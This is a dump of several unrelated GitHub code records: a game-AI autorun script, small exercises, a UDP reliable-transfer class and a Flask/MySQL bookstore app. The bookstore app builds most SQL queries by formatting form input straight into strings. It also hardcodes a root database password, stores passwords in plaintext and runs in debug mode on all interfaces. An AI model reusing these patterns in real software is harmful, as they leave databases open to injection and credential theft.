]\n log.debug(\"%s\", args)\n proc = subprocess.Popen(args)\n pid = proc.pid\n if use_affinity:\n AFFINITY.start(pid)\n proc.wait()\n if use_affinity:\n AFFINITY.end(pid)\n return get_results(log_file, ais, map_name)\n\n\ndef ai_test_arg(ais):\n return \",\".join(\n \"{}:{}:{}:{}\".format(\n ai.slot,\n ai.name,\n factions[ai.faction.lower()],\n ai.team\n ) for ai in ais\n )\n\n\ndef get_results(log_file,ais,map_name):\n game_results = defaultdict(list)\n winners = []\n profiling = []\n with open(log_file) as f:\n for line in f:\n if \"AutoRunEndResult|\" in line:\n _, army_index, result = line.strip().split(\"|\")\n army_index = int(army_index)\n game_results[army_index].append(result)\n if \"victory\" in result:\n winners.append(army_index)\n elif \"AutoRunProfileLog|\" in line:\n profiling.append(line.strip().split(\"|\",1)[1])\n\n return {\"map\": map_name, \"ais\": ais, \"winners\": winners, \"results\": game_results, \"profiling\": profiling}\n","repo_name":"HardlySoftly/FAF-AI-Autorun","sub_path":"_autorun/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22236937492","text":"def contarAbecedario(palabra):\r\n\r\n letra = palabra[0]\r\n letra = letra.lower() #Transformo la letra en minuscula\r\n\r\n number = ord(letra) - 96 # Resto 96 para transformarlo su valor en ASCII a decimal. Las letras en minusculas comienzan con valor 96 en decimal ASCII, por ende -96.\r\n return \"El orden numerico de la letra es: \" + str(number)\r\n\r\npalabra = raw_input(\"Palabra a escribir: \")\r\n\r\nprint(contarAbecedario(palabra))\r\n","repo_name":"EloyHerta/HE_TIC","sub_path":"Ejercicios/Huerta_Ej15.py","file_name":"Huerta_Ej15.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31629373708","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\n\nn,k,*data = map(int,read().split())\nit = iter(data)\nab = [[a,b] for a,b in zip(it,it)]\nab.sort()\nnow = k\nidx = 0\nwhile idx < n:\n if ab[idx][0] <= now:\n now += ab[idx][1]\n idx += 1\n else:\n break\nprint(now)","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc203/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17781329095","text":"from flask import Flask, render_template, request, session, flash, abort, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import desc\nfrom sqlalchemy.sql import func\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import create_engine, text\nfrom flask_table import Table, Col\nimport os\nimport decimal\nimport time\n\nengine = create_engine('mysql+mysqlconnector://root:canossa88@localhost:3306/bookstore', echo=True)\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root:canossa88@localhost:3306/bookstore'\n\ndb = SQLAlchemy(app)\n\n##########################################################################################\n# Table Constructors #\n##########################################################################################\n\nclass customers(db.Model):\n login_name = db.Column(db.String(20), primary_key = True)\n password = db.Column(db.String(20))\n first_name = db.Column(db.String(20))\n last_name = db.Column(db.String(20))\n credit_card = db.Column(db.String(20))\n address = db.Column(db.String(50))\n phone_number = db.Column(db.String(20))\n\n def __init__(self, login_name, password, first_name, last_name, credit_card, address, phone_number):\n self.login_name = login_name\n self.password = password\n self.first_name = first_name\n self.last_name = last_name\n self.credit_card = credit_card\n self.address = address\n self.phone_number = phone_number\n\nclass OrderTable(Table):\n classes = ['table']\n title = Col('book title')\n isbn13 = Col('ISBN13')\n orderid = Col('order id')\n order_date = Col('order date')\n order_status = Col('order status')\n order_qty = Col('quantity')\n\nclass FeedbackTable(Table):\n html_attrs = {\"classes\":\"table\", \"id\": \"FeedbackTable\", \"border\": True}\n classes = ['table']\n login_name = Col('username')\n title = Col('book title')\n isbn13 = Col('ISBN13')\n score = Col('score')\n short_text = Col('comment')\n feedback_date = Col('date')\n avg_rating = Col('rating')\n\nclass RatingTable(Table):\n html_attrs = {\"classes\":\"table\", \"id\": \"RateTable\", \"border\": True}\n classes = ['table']\n title = Col('book title')\n isbn13 = Col('ISBN13')\n login_name = Col('customer name')\n rating = Col('rating')\n\n\nclass RateTable(Table):\n classes = ['table']\n title = Col('book title')\n isbn13 = Col('ISBN13')\n customer_rating = Col('customer name')\n rating = Col('rating')\n\nclass BrowseTable(Table):\n #classes = [\"Banana\"]\n html_attrs = {\"classes\":\"table\", \"id\": \"BrowseTable\", \"border\": True}\n isbn13 = Col('ISBN13')\n title = Col('title')\n authors = Col('authors')\n publisher = Col('publisher')\n year_of_publication = Col('year_of_publication')\n inventory_qty = Col('inventory_qty')\n price = Col('price')\n bookformat = Col('format')\n keywords = Col('keywords')\n subject = Col('subject')\n avgscore = Col('avgscore')\n\nclass RecTable(Table):\n classes = ['table']\n title = Col('book title')\n isbn13 = Col('ISBN13')\n\nclass StatTable(Table):\n classes = ['table']\n title = Col('book title')\n authors = Col('authors')\n publisher = Col('publisher')\n\nclass StatTableEntry(object):\n def __init__(self, title, authors, publisher):\n self.title = title\n self.authors = authors\n self.publisher = publisher\n\n#Make table classes\n\n##########################################################################################\n# Flask App Routes #\n##########################################################################################\n\n'''\nQuestion 1: Login statements\nUser can login\nAdd admin login (implement book registration with manager later)\n'''\n\n@app.route('/')\ndef index():\n if not session.get('logged_in'):\n return redirect('login')\n else:\n username = session['login_name']\n if username != 'manager':\n return render_template('index.html')\n return render_template('indexm.html')\n\n@app.route('/registration/', methods=['GET'])\ndef registration():\n return render_template('registration.html', regerror='')\n\n@app.route('/registration/', methods=['POST'])\ndef registration_post():\n if request.form['my-form'] == 'register':\n first_name = request.form['first_name'].strip()\n last_name = request.form['last_name'].strip()\n login_name = request.form['username'].strip()\n password = request.form['password'].strip()\n address = request.form['address'].strip()\n credit_card = request.form['ccno'].strip()\n phone_number = request.form['phone'].strip()\n newcustomer = customers(login_name, password, first_name, last_name, credit_card, address, phone_number)\n try:\n db.session.add(newcustomer)\n db.session.commit()\n session['logged_in'] = True\n session['login_name'] = login_name\n return redirect('/')\n except IntegrityError:\n return render_template('registration.html', regerror='Error: Duplicate username found, please try another username.')\n elif request.form['my-form'] == 'back':\n return redirect('/')\n\n\n@app.route('/login/', methods=['GET'])\ndef login():\n return render_template('login.html', loginerror='')\n\n@app.route('/login/', methods=['POST'])\ndef do_admin_login():\n POST_USERNAME = str(request.form['login_name'].strip())\n POST_PASSWORD = str(request.form['password'].strip())\n\n Session = sessionmaker(bind=engine)\n s = Session()\n query = s.query(customers).filter(customers.login_name.in_([POST_USERNAME]), customers.password.in_([POST_PASSWORD]) )\n result = query.first()\n if result:\n flash(\"successfully logged in\")\n session['logged_in'] = True\n session['login_name'] = POST_USERNAME\n else:\n return render_template('login.html', loginerror='''Error: Wrong username or password.''')\n return redirect('/')\n\n@app.route('/logout')\ndef logout():\n session['logged_in'] = False\n session['login_name'] = None\n return redirect(\"/\")\n\n'''\nQuestion 3: Added profile data\nGetting data and presenting it in tables for the profile page\n'''\n@app.route('/getrecord/', methods=['GET'])\ndef getrecord():\n if not session.get('logged_in'):\n return redirect('/login')\n username = ''\n if 'login_name' in session:\n Login_name=session['login_name']\n username = Login_name\n rs = []\n qresult = db.engine.execute(\"select * from Customers where login_name='%s'\"%username)\n for row in qresult:\n rs.append(row)\n info1 = rs[0]\n\n rs = []\n qresult = db.engine.execute(\"select b.title, o.isbn13, ob.orderid, ob.order_date, ob.order_status, o.order_qty from ordered_books ob, orders o, books b where ob.customer = '{}' and ob.orderid = o.orderid and b.isbn13 = o.isbn13;\".format(username))\n for row in qresult:\n rs.append(row)\n orderlist = rs\n ordertable = OrderTable(orderlist)\n\n rs = []\n qresult = db.engine.execute(\"select t1.login_name, t1.title, t1.isbn13, t1.score, t1.short_text, t1.feedback_date, t2.avg_rating from (select fb.login_name, b.title, fb.isbn13, fb.score, fb.short_text, fb.feedback_date from Feedback fb, Books b where fb.login_name = '{}' and b.isbn13 = fb.isbn13) as t1 left outer join (select avg(rating) as avg_rating, isbn13 from rate where login_name = '{}' group by isbn13) as t2 on t1.isbn13 = t2.isbn13;\".format(username, username))\n for row in qresult:\n rs.append(row)\n feedbacklist = rs\n feedbacktable = FeedbackTable(feedbacklist)\n\n rs = []\n qresult = db.engine.execute(\"select b.title, r.isbn13, r.login_name, r.rating from Books b, Rate r where (r.customer_rating = '{}' and b.isbn13 = r.isbn13);\".format(username))\n for row in qresult:\n rs.append(row)\n ratelist = rs\n ratetable = RatingTable(ratelist)\n\n if username == 'manager':\n return render_template('userrecord.html', username=info1[0], password=info1[1], first_name=info1[2], last_name=info1[3], credit_card=info1[4], address=info1[5], phone_number=info1[6], ordertable=ordertable.__html__(), feedbacktable=feedbacktable.__html__(), ratetable=ratetable.__html__(), manager='Manager')\n return render_template('userrecord.html', username=info1[0], password=info1[1], first_name=info1[2], last_name=info1[3], credit_card=info1[4], address=info1[5], phone_number=info1[6], ordertable=ordertable.__html__(), feedbacktable=feedbacktable.__html__(), ratetable=ratetable.__html__(), manager='')\n\n\n'''\nQuestion 8: Added browse method to look up books\n'''\n@app.route('/browse/', methods=['GET'])\ndef browse():\n if not session.get('logged_in'):\n return redirect('/login')\n Login_name=session['login_name']\n username = Login_name\n if username == 'manager':\n return render_template('browse.html', manager='Manager')\n return render_template('browse.html', manager='')\n\n@app.route('/browse/', methods=['POST'])\ndef browse_post():\n Login_name=session['login_name']\n username = Login_name\n manager = ''\n if username == 'manager':\n manager = 'Manager'\n\n if request.form['my-form'] == 'search':\n authorForm = request.form['author']\n publisherForm = request.form['publisher']\n titleForm = request.form['title']\n subjectForm = request.form['subject']\n allquery = request.form['basicsearch']\n wherequery = \" where\"\n if authorForm:\n wherequery += \" bo.authors = '{}' and\".format(authorForm)\n if publisherForm:\n wherequery += \" bo.publisher = '{}' and\".format(publisherForm)\n if titleForm:\n wherequery += \" bo.title = '{}' and\".format(titleForm)\n if subjectForm:\n wherequery += \" bo.subject = '{}'\".format(subjectForm)\n if allquery:\n wherequery += \" (bo.authors = '{}' or bo.publisher = '{}' or bo.title = '{}' or bo.subject = '{}')\".format(allquery, allquery, allquery, allquery)\n if wherequery == \" where\":\n wherequery = \"\"\n if wherequery[-3:] ==\"and\":\n wherequery = wherequery[:-3]\n\n optionForm = request.form['options']\n\n # sort by year, descending order\n if optionForm == 'year':\n sort_order = 'year_of_publication'\n # sort by score, descending order\n elif optionForm == 'score':\n sort_order = 'avgscore'\n\n sqlquery = \"select b.isbn13, b.title, b.authors, b.publisher, b.year_of_publication, b.inventory_qty, b.price, b.format as bookformat, b.keywords, b.subject, c.avgscore from (select bo.isbn13, bo.title, bo.authors, bo.publisher, bo.year_of_publication, bo.inventory_qty, bo.price, bo.format, bo.keywords, bo.subject from Books bo{}) as b left outer join (select avg(score) as avgscore, isbn13 from feedback group by isbn13) as c on b.isbn13 = c.isbn13 order by {} desc;\".format(wherequery, sort_order)\n\n print(sqlquery)\n\n booklist = []\n qresult = db.engine.execute(sqlquery)\n for row in qresult:\n booklist.append(row)\n\n booktable = BrowseTable(booklist)\n return render_template('bookpage.html', booktable='

        Browse Results


        '+booktable.__html__(), manager=manager)\n\n ''' Question 6 '''\n\n if request.form['my-form'] == 'Feedback':\n isbn13Form = request.form['feedback_isbn13']\n scoreForm = request.form['score']\n commentForm = request.form['comment']\n date = time.strftime(\"%Y-%m-%d\")\n login_name=session['login_name']\n try:\n db.engine.execute(\"insert into feedback (isbn13, login_name, score, short_text, feedback_date) values ('{}','{}','{}','{}','{}')\".format(isbn13Form,login_name,scoreForm,commentForm,date))\n success = \"Your feedback for this book has been recorded successfully\"\n except IntegrityError:\n return render_template('bookpage.html', booktable='You have already rated this book before or you specified an invalid ISBN13', manager=manager)\n except Exception:\n return render_template('bookpage.html', booktable='Something went wrong, please try again', manager=manager)\n return render_template('bookpage.html', booktable=success, manager=manager)\n\n ''' Question 9 '''\n\n if request.form['my-form'] == 'Get Top Feedback':\n isbn13Form = request.form['topfeedback_isbn13']\n limitForm = request.form['topfeedback']\n login_name=session['login_name']\n feedbackList = []\n qresult = db.engine.execute(\"select t1.login_name, t1.title, t1.isbn13, t1.score, t1.short_text as short_text, t1.feedback_date, t2.avg_rating from (select fb.login_name, b.title, fb.isbn13, fb.score, fb.short_text, fb.feedback_date from Feedback fb, Books b where fb.isbn13 = '{}' and b.isbn13 = fb.isbn13) as t1 left outer join (select login_name, isbn13, avg(rating) as avg_rating from Rate where isbn13 = '978-1501138003' group by login_name, isbn13) as t2 on t1.login_name = t2.login_name order by t2.avg_rating desc limit {};\".format(isbn13Form, limitForm))\n for row in qresult:\n feedbackList.append(row)\n feedbacktable = FeedbackTable(feedbackList)\n return render_template('bookpage.html', booktable='

        Top '+limitForm+' Feedback for the book


        '+feedbacktable.__html__(), manager=manager)\n\n ''' Question 7 '''\n\n if request.form['my-form'] == 'Rate':\n login_nameForm = request.form['login_name']\n isbn13Form = str(request.form['rate_isbn13'])\n rateForm = int(request.form['rating'])\n login_name=session['login_name']\n if login_nameForm == login_name:\n return render_template('bookpage.html', booktable='ERROR: You are not allowed to rate your own feedback')\n try:\n db.engine.execute(\"insert into rate (login_name, isbn13, customer_rating, rating) values ('{}','{}','{}','{}')\".format(login_nameForm, isbn13Form, login_name, rateForm))\n success = '''Your rating for ''' + login_nameForm + \"'s feedback for this book has been recorded successfully\"\n except IntegrityError:\n return render_template('bookpage.html', booktable='ERROR: You have already rated this feedback before or you specified an invalid input')\n except Exception:\n return render_template('bookpage.html', booktable='Something went wrong, please try again')\n return render_template('bookpage.html', booktable=success)\n\n return render_template('bookpage.html', booktable=booktable.__html__(), manager=manager)\n\n'''Question 2'''\n@app.route('/browse/order', methods=['POST'])\ndef order_post():\n Session = sessionmaker(bind=engine)\n s = Session()\n recolist = []\n index = 0\n manager = ''\n try:\n orderid = 1\n for a in db.engine.execute(\"select orderid+1 from orders order by orderid desc limit 1;\"):\n orderid = a[0]\n except:\n orderid = 1\n status = 'arrived'\n date = time.strftime(\"%Y-%m-%d\")\n customer = ''\n isbn13str = request.form['isbn13']\n isbn13list = isbn13str.split(',')\n copiesstr = request.form['copies']\n copieslist = copiesstr.split(',')\n\n for k in copieslist:\n if int(k) <= 0 or k == '':\n return render_template('bookpage.html', booktable='Invalid quantities for order, please try again.', manager=manager)\n\n for j in isbn13list:\n if j == '':\n return render_template('bookpage.html', booktable='Wrong format of entries for order, please try again.', manager=manager)\n toorder = db.engine.execute(\"select * from books where isbn13 = '{}';\".format(j))\n if toorder == None:\n return render_template('bookpage.html', booktable='One or more ISBN13 you entered is/are not valid, please try again.', manager=manager)\n\n if len(isbn13list) != len(copieslist):\n return render_template('bookpage.html', booktable='Wrong format of entries for order, please try again.', manager=manager)\n\n if 'login_name' in session:\n Login_name=session['login_name']\n customer = Login_name\n if customer == 'manager':\n manager = 'Manager'\n\n for i in range(len(isbn13list)):\n for j in range(i + 1, len(isbn13list)):\n try:\n if isbn13list[i] == isbn13list[j]:\n isbn13list.pop(j)\n copieslist[i] = str(int(copieslist[i]) + int(copieslist[j]))\n copieslist.pop(j)\n except:\n print ('finished compressing lists for duplicates')\n\n newob = []\n newo = []\n\n while index < len(isbn13list):\n try:\n isbn13 = isbn13list[index]\n copies = int(copieslist[index])\n for rs in db.engine.execute(\"select inventory_qty from Books where isbn13 = '{}'\".format(isbn13)): #Select the current inventory\n book_curr_qty = rs[0]\n tempqty = int(book_curr_qty) - copies\n if tempqty < 0:\n return render_template('bookpage.html', booktable='Sorry, one or more books you ordered is/are out of stock or you have ordered more than the available quantity.', manager=manager)\n #db.engine.execute(\"update books set inventory_qty = {} where isbn13 = '{}'\".format(tempqty, isbn13))\n db.engine.execute(\"insert into Ordered_books (orderid, customer, order_date, order_status) values ('{}','{}',DATE '{}','{}');\".format(orderid, customer, date, status))\n db.engine.execute(\"insert into Orders values ('{}','{}','{}');\".format(orderid, isbn13, copies))\n recom = db.engine.execute(\"select title, isbn13 from books where isbn13 in (select isbn13 from orders where isbn13 <> '{}' AND orderid in (select orderid from ordered_books where customer in (select customer from ordered_books where orderid in (select orderid from orders where isbn13 = '{}'))) group by isbn13 order by sum(order_qty) desc);\".format(isbn13,isbn13))\n for rc in recom:\n if rc not in recolist:\n recolist.append(rc)\n index += 1\n orderid += 1\n except Exception:\n return render_template('bookpage.html', booktable='Something went wrong, please check your order again.', manager=manager)\n reco = RecTable(recolist)\n return render_template('recommendation.html', recommendation=reco.__html__(), manager=manager)\n\n'''Manager Options'''\n@app.route('/manager/', methods=['GET'])\ndef manager():\n username = session['login_name']\n if username != 'manager':\n return redirect(url_for('index'))\n return render_template('manager.html', record='', add='')\n\n'''Question 4: Manager adds new book to database'''\n@app.route('/manager/recordnew/', methods=['GET'])\ndef recordnew():\n username = session['login_name']\n if username != 'manager':\n return redirect(url_for('index'))\n return render_template('recordnew.html', recerror='')\n\n@app.route('/manager/recordnew/', methods=['POST'])\ndef recordnew_post():\n title = request.form['title']\n isbn13 = request.form['isbn13']\n authors = request.form['authors']\n publisher = request.form['publisher']\n year_of_publication = request.form['year']\n inventory_qty = request.form['copies']\n price = request.form['price']\n book_format = request.form['format']\n keywords = request.form['keywords']\n subject = request.form['subject']\n try:\n db.engine.execute(\"insert into books values ('{}','{}','{}','{}','{}','{}','{}','{}','{}','{}');\".format(isbn13, title, authors, publisher, year_of_publication, inventory_qty, price, book_format, keywords, subject))\n return render_template('manager.html', record='Successfully recorded new book.', add='')\n except IntegrityError:\n return render_template('recordnew.html', recerror='Duplicate ISBN13, please check the book details again.')\n\n'''Question 5: Increment book count feature'''\n@app.route('/manager/addcopy/', methods=['GET'])\ndef addcopy():\n username = session['login_name']\n if username != 'manager':\n return redirect(url_for('index'))\n return render_template('addcopy.html')\n\n@app.route('/manager/addcopy/', methods=['POST'])\ndef addcopy_post():\n try:\n isbn13 = request.form['isbn13']\n copies = request.form['copies']\n db.engine.execute(\"update books set inventory_qty = inventory_qty + {} where isbn13 = '{}';\".format(copies, isbn13))\n return render_template('manager.html', record='', add='Successfully added copies to book.')\n except:\n return render_template('manager.html', record='', add='The book for the ISBN13 doesn\\'t exist, please check your entries again.')\n\n\n\n@app.route('/manager/statistics', methods=['POST'])\ndef statistics():\n date = time.strftime(\"%Y-%m-%d\")\n\n m = int(request.form['top'])\n if m>5000:\n return render_template('manager.html', record='', add='m value is too large, please try a smaller value!')\n month = request.form['month']\n year = request.form['year']\n titlelist = []\n authorlist = []\n publisherlist = []\n statslist = []\n\n db.engine.execute(\"create table temp_table select ISBN13 , sum(order_qty) as total_qty from orders where orderid in (select orderid from ordered_books where year(order_date) = '%s' and month(order_date) = '%s') group by ISBN13 order by total_qty desc limit %s\" % (year, month, m))\n\n titlestat = db.engine.execute(\"select title from books join temp_table on books.ISBN13 = temp_table.ISBN13;\")\n for ts in titlestat:\n titlelist.append(ts.title)\n\n authorstat = db.engine.execute(\"select authors from books join temp_table on books.ISBN13 = temp_table.ISBN13;\")\n for ast in authorstat:\n authorlist.append(ast.authors)\n\n publisherstat = db.engine.execute(\"select publisher from books join temp_table on books.ISBN13 = temp_table.ISBN13;\")\n for ps in publisherstat:\n publisherlist.append(ps.publisher)\n\n for i in range(0,m):\n try:\n arg1 = titlelist[i]\n except IndexError:\n arg1 = ''\n try:\n arg2 = authorlist[i]\n except IndexError:\n arg2 = ''\n try:\n arg3 = publisherlist[i]\n except IndexError:\n arg3 = ''\n statslist.append(StatTableEntry(arg1, arg2, arg3))\n\n stats = StatTable(statslist)\n db.engine.execute(\"drop table temp_table\")\n\n return render_template('statistics.html', stats=stats.__html__())\n\n##########################################################################################\n# Running the application #\n##########################################################################################\n\nif __name__ == '__main__':\n app.secret_key = os.urandom(12)\n app.run(debug=True, host='0.0.0.0')","repo_name":"architdate/OnlineBookStore","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":23282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40143839681","text":"import socket\nimport ipaddress\nimport random\nimport threading\nimport time\nfrom datetime import datetime\n\nfrom P3.example.python.packet import Packet\n\n\nclass PacketType:\n ACK = 0\n SYN = 1\n SYN_ACK = 2\n\n\nclass ConnectionState:\n ESTABLISHED = 1\n CLOSED = 0\n\n\nclass MyPacket:\n MIN_LEN = 15\n MAX_LEN = 1024\n\n def __init__(self, packet_type, seq_num, peer_ip_addr, peer_port, ack_num, payload: bytes):\n \"\"\"\n Wrap the Packet class, add ack_num into the packet\n :param packet_type:\n :param seq_num:\n :param peer_ip_addr:\n :param peer_port:\n :param ack_num:\n :param payload: should be bytes\n \"\"\"\n self.packet_type = int(packet_type)\n self.seq_num = int(seq_num)\n self.peer_ip_addr = peer_ip_addr\n self.peer_port = int(peer_port)\n self.ack_num = int(ack_num)\n self.payload = payload\n\n payload_to_router = self.ack_num.to_bytes(4, byteorder='big') + payload\n self.packet_to_router = Packet(packet_type=self.packet_type,\n seq_num=self.seq_num,\n peer_ip_addr=self.peer_ip_addr,\n peer_port=self.peer_port,\n payload=payload_to_router)\n\n def to_bytes(self):\n \"\"\"\n to_raw returns a bytearray representation of the packet in big-endian order.\n :return:\n \"\"\"\n return self.packet_to_router.to_bytes()\n\n def __repr__(self, *args, **kwargs):\n return \"#%d, #%d, peer=%s:%s, size=%d\" % \\\n (self.seq_num, self.ack_num, self.peer_ip_addr, self.peer_port, len(self.payload))\n\n @staticmethod\n def from_bytes(raw):\n \"\"\"\n From raw bytes creates a MyPacket instance\n :param raw:\n :return:\n \"\"\"\n if len(raw) < MyPacket.MIN_LEN:\n raise ValueError(\"Packet is too short: {} bytes\".format(len(raw)))\n if len(raw) > MyPacket.MAX_LEN:\n raise ValueError(\"Packet is exceeded max length: {} bytes\".format(len(raw)))\n\n curr = [0, 0]\n\n def nbytes(n):\n curr[0], curr[1] = curr[1], curr[1] + n\n return raw[curr[0]: curr[1]]\n\n packet_type = int.from_bytes(nbytes(1), byteorder='big')\n seq_num = int.from_bytes(nbytes(4), byteorder='big')\n peer_addr = ipaddress.ip_address(nbytes(4))\n peer_port = int.from_bytes(nbytes(2), byteorder='big')\n ack_num = int.from_bytes(nbytes(4), byteorder='big')\n payload = raw[curr[1]:]\n\n return MyPacket(packet_type=packet_type,\n seq_num=seq_num,\n peer_ip_addr=peer_addr,\n peer_port=peer_port,\n ack_num=ack_num,\n payload=payload)\n\n\nclass ReliableDT:\n def __init__(self, router_addr):\n self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.router_addr = router_addr\n\n self.max_chunk_len = 2\n self.is_sending = False\n\n # for sender side\n self.peer_addr_of_sender = None\n\n self.timeout = 2\n\n self.wsz = 8 # sliding window size\n self.send_buffer = None # sender buffer[wsz], allocate in runtime\n self.timers = None # timers[wsz], timer for each packet in sliding window\n self.acks = None # acks[wsz], received acks in sliding window\n self.send_base = None\n\n self._ack_number = None # used to store last ack number sent by sender in 3-way handshake\n self._seq_number = None # used to store last seq number sent by sender in 3-way handshake\n\n # for receiver side\n self.peer_addr_of_receiver = None\n self.recv_buffer = None\n self.recv_base = None\n self.bytearray_to_be_delivered = None # data can already be delivered\n self.recv_resources_allocated = False\n\n\n def bind(self, addr):\n self.conn.bind(addr)\n\n def connect(self, addr):\n \"\"\"\n Sender side three-way handshake connection to addr\n :param addr: destination address\n :return:\n \"\"\"\n # send SYN message with seq=client_isn\n # client_isn = random.randint(0, 999)\n client_isn = 99\n syn_packet = MyPacket(packet_type=PacketType.SYN,\n seq_num=client_isn,\n peer_ip_addr=addr[0],\n peer_port=addr[1],\n ack_num=0,\n payload=\"\".encode(\"utf-8\"))\n\n while True:\n try:\n self.conn.sendto(syn_packet.to_bytes(), self.router_addr)\n\n self.conn.settimeout(self.timeout)\n\n # after sending SYN, waiting fro SYN_ACK response\n print(\"In connect(), waiting for a SYN_ACK response\")\n response, sender = self.conn.recvfrom(1024)\n response_packet = MyPacket.from_bytes(response)\n if response_packet.packet_type != PacketType.SYN_ACK:\n continue\n if response_packet.ack_num != client_isn + 1:\n continue\n\n server_isn = response_packet.seq_num\n break\n\n except socket.timeout:\n # if timeout occurs, resend SYN\n continue\n\n # received response correctly, send ACK\n ack_packet = MyPacket(packet_type=PacketType.ACK,\n seq_num=client_isn + 1,\n peer_ip_addr=addr[0],\n peer_port=addr[1],\n ack_num=server_isn + 1,\n payload=\"\".encode(\"utf-8\"))\n\n self.conn.sendto(ack_packet.to_bytes(), self.router_addr)\n # self._ack_number = server_isn + 1\n # self._seq_number = client_isn + 1\n\n self.peer_addr_of_sender = addr\n print(\"Sender state -> ESTABLISHED\")\n self.send_base = client_isn + 1\n self.recv_base = server_isn + 1\n\n # todo: if received duplicate SYN_ACK, meaning last ACK was lost, resend the last ACK\n # todo: corrected, no need to resend, the following data packet will have ACK anyway\n\n def accept(self):\n data, sender = None, None\n while True:\n try:\n data, sender = self.conn.recvfrom(1024)\n if sender or data:\n break\n except socket.timeout:\n continue\n\n p = MyPacket.from_bytes(data)\n\n # received SYN, send SYN_ACK back\n if p.packet_type == PacketType.SYN:\n server_isn = 999\n\n ack_id = p.seq_num + 1\n self.recv_base = ack_id\n self.send_base = server_isn + 1\n\n addr = (p.peer_ip_addr, p.peer_port)\n self.peer_addr_of_sender = addr\n\n syn_ack_packet = MyPacket(packet_type=PacketType.SYN_ACK,\n seq_num=server_isn,\n peer_ip_addr=addr[0],\n peer_port=addr[1],\n ack_num=ack_id,\n payload=\"\".encode('utf-8'))\n\n while True:\n try:\n self.conn.sendto(syn_ack_packet.to_bytes(), self.router_addr)\n\n self.conn.settimeout(self.timeout)\n\n # after sending SYN_ACK, waiting for ACK response\n print(\"In accept(), waiting for ACK response from sender\")\n response, sender = self.conn.recvfrom(1024)\n response_packet = MyPacket.from_bytes(response)\n if response_packet.packet_type != PacketType.ACK:\n continue\n if response_packet.ack_num != server_isn + 1:\n continue\n print(\"Server state -> ESTABLISHED\")\n\n # allocate resources for receiver\n self.allocate_receiver_resources(response_packet)\n return self\n\n except socket.timeout:\n continue\n\n\n def sendall(self, data:bytes):\n # split data into chunks\n data_len, chunk_size = len(data), self.max_chunk_len\n chunks = [data[i:i+chunk_size] for i in range(0, data_len, chunk_size)]\n print(chunks)\n\n self.is_sending = True\n\n self.send_buffer = [None] * self.wsz\n self.timers = [None] * self.wsz\n self.acks = [False] * self.wsz\n\n initial_seq_num = self.send_base\n print(\"send_base is : \" + str(self.send_base))\n end_seq_num = self.send_base + len(chunks)\n print(\"end of send base is : \" + str(end_seq_num))\n\n # create a thread to monitor timers\n threading.Thread(target=self.timer_monitor, args=(end_seq_num, )).start()\n\n # create a thread to monitor received acks\n threading.Thread(target=self.ack_monitor_sender, args=(end_seq_num, )).start()\n\n # send each chunk\n for i, chunk in enumerate(chunks):\n while self.is_full(self.send_buffer):\n pass\n\n seq_num = initial_seq_num + i\n packet = MyPacket(packet_type=PacketType.ACK,\n seq_num=seq_num,\n peer_ip_addr=self.peer_addr_of_sender[0],\n peer_port=self.peer_addr_of_sender[1],\n ack_num=self.recv_base,\n payload=chunk)\n\n buffer_index = seq_num - self.send_base\n self.send_buffer[buffer_index] = packet\n self.timers[buffer_index] = datetime.now()\n self.conn.sendto(packet.to_bytes(), self.router_addr)\n print(packet)\n\n\n\n # return all data\n def recvall(self):\n while self.is_sending:\n pass\n\n # if timeout_count > 5, meaning that sender finished sending\n max_timeout_count = 3\n timeout_count = 0\n while True:\n data, sender = None, None\n try:\n data, sender = self.conn.recvfrom(1024)\n except socket.timeout:\n timeout_count += 1\n if data is None or sender is None:\n if not self.recv_resources_allocated:\n print(self.recv_resources_allocated)\n continue\n elif timeout_count < max_timeout_count:\n print(timeout_count)\n continue\n else:\n break\n\n timeout_count = 0\n packet = MyPacket.from_bytes(data)\n\n # if allocate_receiver_resources not have been called\n if not self.recv_resources_allocated:\n self.allocate_receiver_resources(packet)\n\n print(packet.payload)\n self.receiver_actions(packet)\n print(self.bytearray_to_be_delivered)\n # if len(packet.payload) < self.max_chunk_len:\n # break\n\n print(\"recvall done\")\n data = bytes(self.bytearray_to_be_delivered)\n self.bytearray_to_be_delivered = None\n self.recv_resources_allocated = False\n return data\n\n\n def allocate_receiver_resources(self, first_packet):\n print(\"recv base is: \" + str(self.recv_base))\n\n self.peer_addr_of_receiver = (first_packet.peer_ip_addr, first_packet.peer_port)\n self.recv_buffer = [None] * self.wsz\n self.bytearray_to_be_delivered = bytearray()\n self.recv_resources_allocated = True\n\n # if first_packet contains payload, must response to sender\n if first_packet.payload:\n print(\"First packet contains payload is: \")\n print(first_packet.payload)\n self.receiver_actions(first_packet)\n return\n\n\n def receiver_actions(self, packet_recved:MyPacket):\n seq_num = packet_recved.seq_num\n if self.recv_base <= seq_num <= self.recv_base + self.wsz - 1:\n # return a selective ACK packet\n ack_packet = MyPacket(packet_type=PacketType.ACK,\n seq_num=seq_num,\n peer_ip_addr=self.peer_addr_of_receiver[0],\n peer_port=self.peer_addr_of_receiver[1],\n ack_num=seq_num,\n payload=\"\".encode('utf-8'))\n 